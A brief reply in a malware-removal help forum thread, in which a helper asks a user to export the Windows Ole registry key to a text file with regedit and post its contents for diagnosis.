regedit /e c:\spybotset.txt "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole" > OK

That should create the file c:\spybotset.txt
Post the content please.

Regards,
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP